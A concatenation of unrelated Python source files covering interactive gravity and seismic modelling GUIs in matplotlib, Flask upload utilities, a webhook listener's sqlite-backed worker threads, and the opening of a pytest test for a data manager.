            self.nextpoly.append([x, y])
            self.plotx.append(x)
            self.ploty.append(y)
            self.polyline.set_data(self.plotx, self.ploty)
            self.draw()
        if event.button == 3 or event.button == 2:
            if len(self.nextpoly) >= 3:
                self.polygons.append(self.nextpoly)
                self.densities.append(float(self.nextdens))
                self.update()
                self.picking = False
                # Close the outline by repeating the first vertex
                self.plotx.append(self.nextpoly[0][0])
                self.ploty.append(self.nextpoly[0][1])
                self.polyline.set_data(self.plotx, self.ploty)
                fill, = self.mcanvas.fill(self.plotx, self.ploty,
                                          color=self.polyline.get_color(),
                                          alpha=0.5)
                self.polyline.set_label('%1.2f' % (0.001 * self.nextdens))
                self.legend()
                self.draw()
                self.polyplots.append([self.polyline, fill])
                # Start a fresh line for the next polygon
                self.plotx, self.ploty = [], []
                self.nextpoly = []
                self.polyline, = self.mcanvas.plot([], [], marker='o',
                                                   linewidth=2)
    def legend(self):
        """Refresh the density legend on the model canvas."""
        self.leg = self.mcanvas.legend(loc='lower right', numpoints=1,
                                       prop={'size': 9})
        self.leg.get_frame().set_alpha(0.5)
    def key_press(self, event):
        """'e' removes the last vertex while drawing, or the last polygon."""
        if event.key == 'e':
            if self.picking:
                if len(self.nextpoly) == 0:
                    self.picking = False
                    self.legend()
                    self.draw()
                    return 0
                self.nextpoly.pop()
                self.plotx.pop()
                self.ploty.pop()
                self.polyline.set_data(self.plotx, self.ploty)
            else:
                if len(self.polygons) == 0:
                    return 0
                self.polygons.pop()
                self.densities.pop()
                line, fill = self.polyplots.pop()
                line.remove()
                fill.remove()
                self.update()
            self.draw()
class BasinTrap(Moulder):
    """
    Interactive gravity modeling using a trapezoidal model.
    The trapezoid has two surface nodes with fixed position. The bottom two
    have fixed x coordinates but movable z. The x coordinates for the bottom
    nodes are the same as the ones for the surface nodes. The user can then
    model by controling the depths of the two bottom nodes.
    Example::
        # Define the area of modeling
        area = (0, 1000, 0, 1000)
        # Where the gravity effect is calculated
        xp = range(0, 1000, 10)
        zp = [0]*len(xp)
        # Where the two surface nodes are. Use depth = 1 because direct
        # modeling doesn't like it when the model and computation points
        # coincide
        nodes = [[100, 1], [900, 1]]
        # Create the application
        app = BasinTrap(area, nodes, xp, zp)
        # Run it (close the window to finish)
        app.run()
        # and save the calculated gravity anomaly profile
        app.savedata("mydata.txt")
    Parameters:
    * area : list = [xmin, xmax, zmin, zmax]
        Area of the subsurface to use for modeling. Remember, z is positive
        downward.
    * nodes : list of lists = [[x1, z1], [x2, z2]]
        x and z coordinates of the two top nodes. Must be in clockwise order!
    * xp, zp : array
        Arrays with the x and z coordinates of the computation points
    * gz : array
        The observed gravity values at the computation points.
        Will be plotted as black points together with the modeled (predicted)
        data. If None, will ignore this.
    """
    instructions = "Click to set node depth - Right click to change nodes"
    name = "BasinTrap"
    def __init__(self, area, nodes, xp, zp, gz=None):
        """Build the base GUI and install the initial trapezoid model."""
        Moulder.__init__(self, area, xp, zp, gz)
        # Convert the surface nodes from meters to km
        left, right = numpy.array(nodes) * 0.001
        # Start both bottom nodes at half the model depth
        z1 = z2 = 0.001 * 0.5 * (area[3] - area[2])
        self.polygons = [[left, right, [right[0], z1], [left[0], z2]]]
        self.nextdens = -1000
        self.densslider.set_val(self.nextdens * 0.001)
        self.densities = [self.nextdens]
        self.plotx = [v[0] for v in self.polygons[0]]
        self.plotx.append(left[0])
        self.ploty = [v[1] for v in self.polygons[0]]
        self.ploty.append(left[1])
        self.polyline.set_data(self.plotx, self.ploty)
        self.polyline.set_color('k')
        # Which bottom node (left or right) the next click will move
        self.isleft = True
        self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
                                        color='red', linewidth=2)
    def draw_guide(self, x, z):
        """Draw the dashed guide showing where the active node would go."""
        if self.isleft:
            x0, z0 = self.polygons[0][3]
            x1, z1 = self.polygons[0][2]
        else:
            x0, z0 = self.polygons[0][2]
            x1, z1 = self.polygons[0][3]
        self.guide.set_data([x0, x0, x1], [z0, z, z1])
    def move(self, event):
        """Mouse-move handler: update the guide inside the model canvas."""
        if event.inaxes != self.mcanvas:
            return 0
        self.draw_guide(event.xdata, event.ydata)
        self.draw()
    def set_density(self, value):
        """Slider callback: set the trapezoid density and refresh."""
        self.densities[0] = 1000. * value
        self.update()
        self.draw()
    def pick(self, event):
        """Left click sets the active node's depth; right/middle click
        switches which bottom node is active."""
        if event.inaxes != self.mcanvas:
            return 0
        x, y = event.xdata, event.ydata
        if (event.button == 1):
            if self.isleft:
                self.polygons[0][3][1] = y
                self.ploty[3] = y
            else:
                self.polygons[0][2][1] = y
                self.ploty[2] = y
            self.polyline.set_data(self.plotx, self.ploty)
            self.guide.set_data([], [])
            self.update()
            self.draw()
        if event.button == 3 or event.button == 2:
            self.isleft = not self.isleft
            self.draw_guide(x, y)
            self.draw()
    def key_press(self, event):
        """No keyboard interaction for this application."""
        pass
class BasinTri(Moulder):
    """
    Interactive gravity modeling using a triangular model.
    The triangle has two surface nodes with fixed positions. The user can then
    model by controling the bottom node.
    Example::
        # Define the area of modeling
        area = (0, 1000, 0, 1000)
        # Where the gravity effect is calculated
        xp = range(0, 1000, 10)
        zp = [0]*len(xp)
        # Where the two surface nodes are. Use depth = 1 because direct
        # modeling doesn't like it when the model and computation points
        # coincide
        nodes = [[100, 1], [900, 1]]
        # Create the application
        app = BasinTri(area, nodes, xp, zp)
        # Run it (close the window to finish)
        app.run()
        # and save the calculated gravity anomaly profile
        app.savedata("mydata.txt")
    Parameters:
    * area : list = [xmin, xmax, zmin, zmax]
        Area of the subsurface to use for modeling. Remember, z is positive
        downward.
    * nodes : list of lists = [[x1, z1], [x2, z2]]
        x and z coordinates of the two top nodes. Must be in clockwise order!
    * xp, zp : array
        Arrays with the x and z coordinates of the computation points
    * gz : array
        The observed gravity values at the computation points.
        Will be plotted as black points together with the modeled (predicted)
        data. If None, will ignore this.
    """
    instructions = "Click to set node location"
    name = "BasinTri"
    def __init__(self, area, nodes, xp, zp, gz=None):
        """Build the base GUI and install the initial triangle model."""
        Moulder.__init__(self, area, xp, zp, gz)
        # Convert the surface nodes from meters to km
        left, right = numpy.array(nodes) * 0.001
        # Start the bottom node halfway down, centered between the top nodes
        z = 0.001 * 0.5 * (area[3] - area[2])
        x = 0.5 * (right[0] + left[0])
        self.polygons = [[left, right, [x, z]]]
        self.nextdens = -1000
        self.densslider.set_val(self.nextdens * 0.001)
        self.densities = [self.nextdens]
        self.plotx = [v[0] for v in self.polygons[0]]
        self.plotx.append(left[0])
        self.ploty = [v[1] for v in self.polygons[0]]
        self.ploty.append(left[1])
        self.polyline.set_data(self.plotx, self.ploty)
        self.polyline.set_color('k')
        self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
                                        color='red', linewidth=2)
    def draw_guide(self, x, z):
        """Draw the dashed guide from both surface nodes to the cursor."""
        x0, z0 = self.polygons[0][0]
        x1, z1 = self.polygons[0][1]
        self.guide.set_data([x0, x, x1], [z0, z, z1])
    def move(self, event):
        """Mouse-move handler: update the guide inside the model canvas."""
        if event.inaxes != self.mcanvas:
            return 0
        self.draw_guide(event.xdata, event.ydata)
        self.draw()
    def set_density(self, value):
        """Slider callback: set the triangle density and refresh."""
        self.densities[0] = 1000. * value
        self.update()
        self.draw()
    def pick(self, event):
        """Left click moves the bottom node to the cursor position."""
        if event.inaxes != self.mcanvas:
            return 0
        x, y = event.xdata, event.ydata
        if (event.button == 1):
            self.polygons[0][2] = [x, y]
            self.plotx[2] = x
            self.ploty[2] = y
            self.polyline.set_data(self.plotx, self.ploty)
            self.guide.set_data([], [])
            self.update()
            self.draw()
    def key_press(self, event):
        """No keyboard interaction for this application."""
        pass
class Lasagne():
    """
    Interactive modeling of vertical seismic profiling for 1D layered media.
    The wave source is assumed to be on the surface of a vertical borehole. The
    receivers are at given depths. What is measured is the travel-time of
    first arrivals.
    Assumes that the thickness of the layers are known. The user then only
    needs to choose the velocities.
    Example::
        # Define the thickness of the layers
        thickness = [10, 20, 5, 10]
        # Define the measuring points along the well
        zp = range(1, sum(thickness), 1)
        # Define the velocity range
        vmin, vmax = 1, 10000
        # Run the application
        app = Lasagne(thickness, zp, vmin, vmax)
        app.run()
        # Save the modeled data
        app.savedata("mydata.txt")
    Parameters:
    * thickness : list
        The thickness of each layer in order of increasing depth
    * zp : list
        The depths of the measurement stations (seismometers)
    * vmin, vmax : float
        Range of velocities to allow
    * tts : array
        The observed travel-time values at the measurement stations. Will be
        plotted as black points together with the modeled (predicted) data.
        If None, will ignore this.
    """
    instructions = "Click to set the velocity of the layers"
    name = "Lasagne - Vertical seismic profiling for 1D layered media"
    def __init__(self, thickness, zp, vmin, vmax, tts=None):
        """Build the figure, slider and the initial constant-velocity model."""
        if tts is not None:
            if len(tts) != len(zp):
                raise ValueError("zp and tts must have same size")
        if vmin <= 0. or vmax <= 0.:
            raise ValueError("Can't have velocity vmin or vmax <= 0")
        self.tts = tts
        self.zp = zp
        self.thickness = thickness
        # Make the figure
        self.fig = pyplot.figure(figsize=(14, 8))
        self.fig.canvas.set_window_title(self.name)
        self.fig.suptitle(self.instructions)
        self.draw = self.fig.canvas.draw
        # Make the data and model canvas
        self.dcanvas = self.fig.add_subplot(1, 2, 1)
        self.dcanvas.set_ylabel("Depth (m)")
        self.dcanvas.set_xlabel("Travel-time (s)")
        # depth axis inverted so depth increases downward
        # (the original called set_ylim twice with the same arguments)
        self.dcanvas.set_ylim(sum(thickness), 0)
        self.dcanvas.grid()
        self.mcanvas = self.fig.add_subplot(1, 2, 2)
        self.mcanvas.set_ylabel("Depth (m)")
        self.mcanvas.set_xlabel("Velocity (m/s2)")
        self.mcanvas.set_xlim(vmin, vmax)
        self.mcanvas.set_ylim(sum(thickness), 0)
        self.mcanvas.grid()
        self.fig.subplots_adjust(top=0.95, left=0.1, right=0.95, bottom=0.15,
                                 hspace=0.1)
        # Make the sliders
        sliderax = self.fig.add_axes([0.20, 0.03, 0.60, 0.03])
        self.errslider = widgets.Slider(sliderax, 'Error',
                                        0, 10, valinit=0.,
                                        valfmt='%2.1f (percent)')
        # Initialize the data
        self.error = 0.
        # Use explicitly float arrays: ones_like/zeros_like on integer
        # input produced int arrays, silently truncating velocities
        # picked with the mouse.
        self.velocity = vmin * numpy.ones(len(thickness))
        self.predtts = profile.layered_straight_ray(thickness, self.velocity,
                                                    zp)
        # range() instead of the Python 2-only xrange()
        self.layers = [sum(thickness[:i]) for i in range(len(thickness) + 1)]
        self.predplot, = self.dcanvas.plot(self.predtts, zp, '-r', linewidth=2)
        if self.tts is not None:
            self.ttsplot, = self.dcanvas.plot(self.tts, self.zp, 'ok')
        # Duplicate each interior interface depth so the velocity profile
        # plots as a staircase
        self.ploty = [self.layers[0]]
        for y in self.layers[1:-1]:
            self.ploty.append(y)
            self.ploty.append(y)
        self.ploty.append(self.layers[-1])
        self.plotx = numpy.zeros(len(self.ploty))
        self.layerplot, = self.mcanvas.plot(self.plotx, self.ploty, 'o-k',
                                            linewidth=2)
        self.guide, = self.mcanvas.plot([], [], marker='o', linestyle='--',
                                        color='red', linewidth=2)
    def run(self):
        """Start the interactive application (blocks until the window closes)."""
        self.connect()
        pyplot.show()
    def get_data(self):
        """Return the last predicted travel-time profile."""
        return self.predtts
    def savedata(self, fname):
        """Save depth and predicted travel-time as columns of a text file."""
        data = numpy.array([self.zp, self.predtts]).T
        numpy.savetxt(fname, data, fmt='%.5f')
    def connect(self):
        """Wire the slider callback and matplotlib mouse/key events."""
        self.errslider.on_changed(self.set_error)
        self.fig.canvas.mpl_connect('button_press_event', self.pick)
        self.fig.canvas.mpl_connect('key_press_event', self.key_press)
        self.fig.canvas.mpl_connect('motion_notify_event', self.move)
    def set_error(self, value):
        """Slider callback: set the noise level (percent) and refresh."""
        self.error = 0.01 * value
        self.update()
        self.draw()
    def update(self):
        """Recompute predicted travel-times with the current velocities."""
        self.predtts = utils.contaminate(
            profile.layered_straight_ray(self.thickness, self.velocity,
                                         self.zp),
            self.error, percent=True)
        self.predplot.set_data(self.predtts, self.zp)
        if self.tts is not None:
            xmin = min(self.predtts.min(), self.tts.min())
            xmax = max(self.predtts.max(), self.tts.max())
        else:
            xmin = self.predtts.min()
            xmax = self.predtts.max()
        if xmin != xmax:
            self.dcanvas.set_xlim(xmin, xmax)
    def draw_guide(self, x, z):
        """Draw the dashed guide showing the candidate velocity for the
        layer at depth *z*."""
        i = bisect.bisect(self.layers, z)
        if i > 0:
            z1 = self.layers[i - 1]
            z2 = self.layers[i]
            x1 = self.velocity[i - 1]
            self.guide.set_data([x1, x, x, x1], [z1, z1, z2, z2])
    def move(self, event):
        """Mouse-move handler: update the guide inside the model canvas."""
        if event.inaxes != self.mcanvas:
            return 0
        self.draw_guide(event.xdata, event.ydata)
        self.draw()
    def pick(self, event):
        """Left click sets the velocity of the layer under the cursor."""
        if event.inaxes != self.mcanvas:
            return 0
        x, z = event.xdata, event.ydata
        if (event.button == 1):
            i = bisect.bisect(self.layers, z) - 1
            self.velocity[i] = x
            self.plotx[2 * i] = x
            self.plotx[2 * i + 1] = x
            self.layerplot.set_data(self.plotx, self.ploty)
            self.guide.set_data([], [])
            self.update()
            self.draw()
    def key_press(self, event):
        """No keyboard interaction for this application."""
        pass
|
"""
Utility functions for views.
"""
import os
import json
import traceback
import logging
import fnmatch
import sh
from werkzeug.utils import secure_filename
from nephele2.nephele.upload_file import uploadfile
from nephele2.infra.utils.map_validator import MapType
LOGGER = logging.getLogger()
def get_remote_file_list(job_base_dir, allowed_file_exts):
    """
    Gets a list of all file names with the allowed extensions from a
    .listing file generated by wget. Note, if the structure of the .listing
    file ever changes, this method will fail.
    Args:
        job_base_dir (str): the directory path where the .listing file is
        located allowed_file_exts (str): set of allowed file extensions
    Returns:
        list: a list of filename strings
    Raises:
        Exception: any exception generated while trying to read the .listing
        file
    """
    try:
        # Each line of a wget .listing file is an `ls -l` style record:
        # the file name starts at the 9th whitespace-separated field.
        # Joining fields 9..NF with single spaces reproduces the previous
        # awk '{out=""; for(i=9;i<=NF;i++){out=out" "$i}; print out}'
        # pipeline in pure Python, without shelling out via `sh`.
        files = []
        with open(job_base_dir + '.listing') as listing:
            for line in listing:
                files.append(' '.join(line.split()[8:]).strip())
        allowed_exts = ["*."+str(e) for e in list(allowed_file_exts)]
        file_list = []
        for ext in allowed_exts:
            for f_name in fnmatch.filter(files, ext):
                file_list.append(f_name)
        return file_list
    except Exception:
        # Narrowed from BaseException so KeyboardInterrupt/SystemExit
        # propagate without being logged as .listing parse errors.
        LOGGER.error(
            "Error getting file names from .listing file at " +
            str(job_base_dir + '.listing') + "\n" + str(traceback.format_exc()))
        raise
def get_filename_from_path(url_path):
    """
    Extracts a filename from the end of a URL that points to the file.
    Args:
        url_path (url): a URL pointing to a file
    Returns:
        ASCII str: a secure filename
    """
    try:
        # Keep only the segment after the last '/'; IndexError when the
        # URL has no '/' is logged and re-raised like any other failure.
        segments = url_path.rsplit('/', 1)
        return secure_filename(segments[1])
    except Exception:
        LOGGER.error("Error parsing file URL "+str(url_path) +
                     "\n" + str(traceback.format_exc()))
        raise
def get_non_job_argslist(details_form):
    """
    Gets a list of all fields returned with the Job options forms that
    shouldn't be included in the job args list put in the database.
    Args:
        details_form (WTForm): the JobDetails form (a form that is
                               used as a base for most other job
                               options forms)
    Returns:
        list: list of arguments to remove from the job_args list
    """
    # Only the field names matter; the previous loop iterated .items()
    # and ignored every value.
    return ['csrf_token', 'start_job'] + list(details_form.data)
# TODO: we could move this down into the job_type table in the DB
# if we want to store all info about a job in one place
def get_analysis_type(data_type):
    """
    Return the MapType associated with the data type.
    Args:
        data_type (str): The type of sequence data being provided
    Returns:
        MapType: The MapType associated with the data type
    """
    # Table-driven dispatch instead of a long if/elif chain; any unknown
    # data type falls back to the standard pipeline, as before.
    type_map = {
        "SE": MapType.SE_DEMULTIPLEX,
        "PE": MapType.PAIRED_END,
        "ITS_PE": MapType.PAIRED_END,
        "WGS_PE": MapType.PE_WGS,
        "WGS_SE": MapType.SE_WGS,
        "QC_PE": MapType.PE_QC,
        "QC_SE": MapType.SE_QC,
        "DS_Analysis": MapType.DS_ANALYSIS,
    }
    return type_map.get(data_type, MapType.STANDARD)
def get_column_map(table_data):
    """Collect the values of each column label across all rows.
    Args:
        table_data (list): iterable of dict-like rows
    Returns:
        dict: column label mapped to the list of its values in row order
    """
    columns = {}
    for row in table_data:
        for label, value in row.items():
            columns.setdefault(label, []).append(value)
    return columns
##### BLUEIMP STUFF #####
# TODO: see if we can get blueimp to play nice with WTF so we can get rid of
# this
def allowed_file(filename, allowed_exts):
    """
    The validator for blueimp that limits which file extensions are allowed.
    Args:
        filename (str): a filepath
        allowed_exts (str): set of allowed file extensions
    Returns:
        bool: True if extension is an allowed file type, False otherwise
    """
    lowered = filename.lower()
    # Case-insensitive glob match against each "*.<ext>" pattern
    return any(
        fnmatch.fnmatch(lowered, "*." + str(ext))
        for ext in allowed_exts
    )
def get_file_list(uniq_dname):
    """
    Returns a list of files in the directory. Required to return
    a JSON by blueimp.
    Args:
        uniq_dname (str): filepath to the directory to query
    Returns:
        JSON: a JSON structured like '{"files": [list_of_filepaths]}'
    """
    file_display = []
    try:
        for entry in os.listdir(uniq_dname):
            full_path = os.path.join(uniq_dname, entry)
            if not os.path.isfile(full_path):
                continue
            saved = uploadfile(name=entry, size=os.path.getsize(full_path))
            file_display.append(saved.get_file())
        return json.dumps({"files": file_display})
    except OSError:
        LOGGER.error("Error while getting the list of files in dir "
                     + str(uniq_dname)+": "+str(traceback.format_exc()))
        # This could be a FileNotFound err from the dir not existing,
        # or a PermissionError thrown from the getsize call
        # TODO: decide if this is the right thing to do,
        # it will just return whatever it's found so far
        return json.dumps({"files": file_display})
def _upload_error_response(files):
    """Build the blueimp JSON error payload for a failed upload."""
    result = uploadfile(name=files.filename,
                        type=files.content_type,
                        size=0,
                        not_allowed_msg="INTERNAL SERVER ERROR")
    return json.dumps({"files": [result.get_file()]})


def save_file(dirname, files, allowed_exts):
    """
    Save file function called by blueimp. Must return a JSON of the list of
    upload_file objects that were saved, or failed to save.
    Args:
        dirname (str): The path to the directory where the files
                       should be saved
        files (FileStorage): the uploaded file to save
        allowed_exts (str): set of allowed file extensions
    Returns:
        JSON: a JSON string that looks like {"files": [uploadfile().get_file()]}
    """
    try:
        filename = secure_filename(files.filename)
        mime_type = files.content_type
        if not allowed_file(files.filename, allowed_exts):
            result = uploadfile(name=filename,
                                type=mime_type,
                                size=0,
                                not_allowed_msg="File type not allowed")
        else:
            # save file to disk
            uploaded_file_path = os.path.join(dirname, filename)
            files.save(uploaded_file_path)
            os.chmod(uploaded_file_path, 0o666)  # chmod a-x
            # get file size after saving
            size = os.path.getsize(uploaded_file_path)
            # return json for js call back
            result = uploadfile(name=filename, type=mime_type, size=size)
        return json.dumps({"files": [result.get_file()]})
    except FileNotFoundError:
        LOGGER.error("File not found "+str(traceback.format_exc()))
        return _upload_error_response(files)
    except Exception:
        LOGGER.error("Could not save file " + str(traceback.format_exc()))
        return _upload_error_response(files)
def delete_file(dirname, filename):
    """
    Deletes a file from a given directory.
    This method is used by blueimp and is required
    to return a JSON with the structure {<filename>: is_deleted}.
    Args:
        dirname (str): path of the directory the file should be removed from
        filename (str): name of the file to delete
    Returns:
        JSON: a JSON with the name of the file and a boolean indication of
        whether or not it was deleted
    """
    target = os.path.join(dirname, filename)
    # blueimp expects the string 'True'/'False', not JSON booleans
    deleted = 'False'
    if os.path.exists(target):
        try:
            os.remove(target)
            deleted = 'True'
        except Exception:
            deleted = 'False'
    return json.dumps({filename: deleted})
|
<filename>lystener/task.py
# -*- encoding:utf-8 -*-
# © <NAME>
import os
import sys
import json
import queue
import sqlite3
import hashlib
import traceback
import threading
import importlib
from lystener import logMsg, loadJson, DATA, JSON
def initDB():
    """Open (creating if needed) the lystener sqlite database.
    Ensures the DATA folder and the fingerprint/history tables exist.
    Returns:
        sqlite3.Connection: connection with row_factory set to sqlite3.Row
    """
    if not os.path.exists(DATA):
        os.makedirs(DATA)
    sqlite = sqlite3.connect(os.path.join(DATA, "database.db"))
    cursor = sqlite.cursor()
    # Both tables key their rows by webhook token
    for table, columns in (
        ("fingerprint", "hash TEXT UNIQUE, token TEXT"),
        ("history", "signature TEXT UNIQUE, token TEXT"),
    ):
        cursor.execute(
            "CREATE TABLE IF NOT EXISTS %s(%s);" % (table, columns)
        )
    sqlite.row_factory = sqlite3.Row
    sqlite.commit()
    return sqlite
def vacuumDB():
    """Purge database rows for tokens found in webhook JSON files but not in
    the history table, then VACUUM and close the database."""
    conn = sqlite3.connect(
        os.path.join(DATA, "database.db"),
        isolation_level=None
    )
    conn.row_factory = sqlite3.Row
    history_tokens = set(
        row["token"] for row in
        conn.execute("SELECT DISTINCT token FROM history").fetchall()
    )
    webhook_tokens = [
        loadJson(name).get("token", None)
        for name in os.listdir(JSON) if name.endswith(".json")
    ]
    for tok in webhook_tokens:
        if tok not in history_tokens:
            cleanDB(conn, tok)
    conn.execute("VACUUM")
    conn.commit()
    conn.close()
def cleanDB(sqlite, token):
    """Delete every fingerprint and history row associated with *token*.

    Args:
        sqlite (sqlite3.Connection): open database connection.
        token (str): webhook token whose records are purged.

    Note:
        The caller is responsible for committing the transaction.
    """
    # fixed typo in log message: 'hitory' -> 'history'
    logMsg("removing history of token %s..." % token)
    sqlite.execute("DELETE FROM fingerprint WHERE token=?", (token,))
    sqlite.execute("DELETE FROM history WHERE token=?", (token,))
def trace(sqlite, token, content):
    """Record the sha256 fingerprint of *content* for *token*."""
    fingerprint = jsonHash(content)
    sqlite.execute(
        "INSERT INTO fingerprint(hash, token) VALUES(?, ?);",
        (fingerprint, token)
    )
def untrace(sqlite, token, content):
    """Remove the fingerprint previously stored by trace() for *content*."""
    fingerprint = jsonHash(content)
    sqlite.execute(
        "DELETE FROM fingerprint WHERE hash=? AND token=?",
        (fingerprint, token)
    )
def webhookName(auth, mod, func):
    """Build the webhook filename: sha256('whk://<auth>.<mod>.<func>') + '.json'."""
    identifier = "whk://{0}.{1}.{2}".format(auth, mod, func)
    digest = hashlib.sha256(identifier.encode("utf-8")).hexdigest()
    return digest + ".json"
def isGenuineWebhook(auth, webhhook=None):
    """Check that *auth* matches the webhook's stored security hash.

    Args:
        auth (str): authorization value provided by the caller.
        webhhook (dict): stored webhook data with ``token`` and ``hash`` keys.

    Returns:
        bool: True if sha256(auth + token) equals the stored hash.
    """
    # replaced the shared mutable default `webhhook={}` with the None sentinel
    webhhook = {} if webhhook is None else webhhook
    token = auth + webhhook.get("token", "")
    return hashlib.sha256(
        token.encode("utf-8")
    ).hexdigest() == webhhook.get("hash", "")
def jsonHash(data):
    """Return a stable sha256 hex digest for JSON-serializable *data*.

    Serialization uses sorted keys and compact separators so logically
    equal structures always hash identically.
    """
    raw = json.dumps(data, sort_keys=True, separators=(',', ':'))
    # hexdigest() always returns `str` on Python 3 — the original's
    # `h.decode() if isinstance(h, bytes)` branch was dead code
    return hashlib.sha256(raw.encode("utf-8")).hexdigest()
def setInterval(interval):
    """
    threaded decorator.

    >>> @setInterval(10)
    ... def tick():
    ...     print("Tick")
    >>> event = tick()  # print 'Tick' every 10 sec
    >>> type(event)
    <class 'threading.Event'>
    >>> event.set()  # stop printing 'Tick' every 10 sec
    """
    def decorator(function):
        """Wrap *function* so that calling it starts a periodic daemon thread."""
        def wrapper(*args, **kwargs):
            """Spawn the loop thread and return its stop event."""
            stop_event = threading.Event()

            def periodic():
                # Event.wait doubles as the timer; loop ends once set() is called
                while not stop_event.wait(interval):
                    function(*args, **kwargs)

            runner = threading.Thread(target=periodic)
            runner.daemon = True  # never block interpreter exit
            runner.start()
            return stop_event
        return wrapper
    return decorator
class Task(threading.Thread):
    """Base class for the listener's background daemon workers.

    Class attributes shared by every worker:
        STOP: event checked by all run() loops to know when to exit.
        LOCK: lock serializing access to shared resources (db, logger).
    """
    STOP = threading.Event()
    LOCK = threading.Lock()

    def __init__(self, *args, **kwargs):
        # workers are daemonized and started as soon as they are built
        super().__init__()
        self.daemon = True
        self.start()
class MessageLogger(Task):
    """Daemon consuming messages from JOB and writing them via logMsg."""
    JOB = queue.Queue()

    def run(self):
        logMsg("MessageLogger is running in background...")
        while not Task.STOP.is_set():
            # block until a message is queued
            msg = MessageLogger.JOB.get()
            Task.LOCK.acquire()
            try:
                logMsg(msg)
            except Exception as exception:
                msg = "log error:\n%r\n%s" % \
                    (exception, traceback.format_exc())
            finally:
                Task.LOCK.release()
        logMsg("exiting MessageLogger...")

    @staticmethod
    def log(msg):
        """Queue *msg* for asynchronous logging."""
        MessageLogger.JOB.put(msg)
class FunctionCaller(Task):
    """Daemon executing queued (func, args, kwargs) jobs one at a time."""
    JOB = queue.Queue()

    def run(self):
        logMsg("FunctionCaller is running in background...")
        while not Task.STOP.is_set():
            # block until a call is queued
            func, args, kwargs = FunctionCaller.JOB.get()
            Task.LOCK.acquire()
            try:
                response = func(*args, **kwargs)
            except Exception as exception:
                msg = "%s response:\n%r\n%s" % \
                    (func, exception, traceback.format_exc())
            else:
                msg = "%s response:\n%r" % (func, response)
            finally:
                Task.LOCK.release()
            # forward the outcome to the logger daemon
            MessageLogger.JOB.put(msg)
        logMsg("exiting FunctionCaller...")

    @staticmethod
    def call(func, *args, **kwargs):
        """Queue a function call for background execution."""
        FunctionCaller.JOB.put([func, args, kwargs])
class TaskChecker(Task):
    """Daemon validating queued webhook jobs before execution.

    Each job is checked against its stored webhook security hash; valid
    jobs are resolved to a python callable and forwarded to
    TaskExecutioner, invalid ones are dropped and untraced.
    """
    JOB = queue.Queue()
    # sqlite connection, created inside run() because sqlite objects must be
    # used from the thread that created them
    DB = None

    def run(self):
        # sqlite db opened within thread
        TaskChecker.DB = initDB()
        logMsg("TaskChecker is running in background...")
        # run until Task.killall() called
        while not Task.STOP.is_set():
            skip = True
            # wait until a job is given
            module, name, auth, content = TaskChecker.JOB.get()
            # get webhook data
            webhook = loadJson(webhookName(auth, module, name))
            # compute security hash
            if not isGenuineWebhook(auth, webhook):
                msg = "not authorized here\n%s" % json.dumps(content, indent=2)
            else:
                # build a signature
                signature = "%s@%s.%s[%s]" % (
                    webhook["event"], module, name, jsonHash(content)
                )
                skip = False
            if not skip:
                # import asked module
                try:
                    obj = importlib.import_module("lystener." + module)
                except Exception as exception:
                    skip = True
                    msg = "%r\ncan not import python module %s" % \
                        (exception, module)
                else:
                    # try to get function by name
                    TaskExecutioner.MODULES.add(obj)
                    func = getattr(obj, name, False)
                    if callable(func):
                        TaskExecutioner.JOB.put(
                            [func, content, webhook["token"], signature]
                        )
                        msg = "forwarded: " + signature
                    else:
                        skip = True
                        msg = "python definition %s not found in %s or is " \
                            "not callable" % (name, module)
            # a rejected job is removed from the fingerprint table so the
            # same content may be submitted again later
            if skip and "token" in webhook:
                Task.LOCK.acquire()
                # ATOMIC ACTION -----------------------------------------------
                untrace(TaskChecker.DB, webhook["token"], content)
                TaskChecker.DB.commit()
                # END ATOMIC ACTION -------------------------------------------
                Task.LOCK.release()
            # push msg
            MessageLogger.JOB.put(msg)
        logMsg("exiting TaskChecker...")
class TaskExecutioner(Task):
    """Daemon running validated webhook jobs and recording their outcome.

    Jobs arrive from TaskChecker as [func, data, token, signature]. A
    successful response is stored in the history table; failures are
    untraced so the same content may be submitted again.
    """
    JOB = queue.Queue()
    # modules imported by TaskChecker; dropped when the queue drains so code
    # edits are picked up without restarting the listener
    MODULES = set([])
    # sqlite connection, created inside run() (thread affinity)
    DB = None

    def run(self):
        logMsg("TaskExecutioner is running in background...")
        TaskExecutioner.DB = initDB()
        while not Task.STOP.is_set():
            error = True
            response = {}
            # wait until a job is given
            func, data, token, sig = TaskExecutioner.JOB.get()
            try:
                response = func(data)
            except Exception as exception:
                msg = "%s response:\n%s\n%s" % \
                    (func, "%r" % exception, traceback.format_exc())
            else:
                error = False
                msg = "%s response:\n%s" % (func, response)
            # push msg
            MessageLogger.JOB.put(msg)
            # daemon waits here to log results, update database and clean
            # memory
            try:
                Task.LOCK.acquire()
                # ATOMIC ACTION -----------------------------------------------
                if not error and response.get("success", False):
                    TaskExecutioner.DB.execute(
                        "INSERT OR REPLACE INTO history(signature, token) "
                        "VALUES(?, ?);", (sig, token)
                    )
                # remove the module if all jobs done so if code is modified it
                # will be updated without a listener restart
                if TaskExecutioner.JOB.empty():
                    empty = False
                    while not empty:
                        try:
                            obj = TaskExecutioner.MODULES.pop()
                        except Exception:
                            empty = True
                        else:
                            sys.modules.pop(obj.__name__, False)
                            del obj
            except Exception as exception:
                MessageLogger.JOB.put(
                    "Internal error occured:\n%s\n%s" %
                    ("%r" % exception, traceback.format_exc())
                )
            finally:
                # a failed job is forgotten so it can be pushed again
                if error:
                    untrace(TaskExecutioner.DB, token, data)
                TaskExecutioner.DB.commit()
                # END ATOMIC ACTION -------------------------------------------
                Task.LOCK.release()
        logMsg("exiting TaskExecutioner...")
def killall():
    """Stop all background daemons."""
    # raise the shared stop flag first so each loop exits after its next job
    Task.STOP.set()
    noop = lambda n: n
    # every worker blocks on JOB.get(); push one dummy job per queue so each
    # loop wakes up, re-checks STOP and terminates
    TaskExecutioner.JOB.put([noop, {"success": False}, "", ""])
    TaskChecker.JOB.put(["", "", "?", {}])
    FunctionCaller.JOB.put([noop, {"Exit": True}, {}])
    MessageLogger.JOB.put("kill signal sent !")
|
<reponame>RelationRx/pyrelational
"""Unit tests for data manager
"""
import pytest
import torch
from pyrelational.data import GenericDataManager
from tests.test_utils import DiabetesDataset, get_classification_dataset
def test_init_and_basic_details():
    """Data manager exposes batch size and labelled indices after init."""
    manager = get_classification_dataset(50)
    assert len(manager.l_indices) == 50
    assert manager.loader_batch_size == 10
def test_print():
    """repr() is the bare class name; str() includes split statistics."""
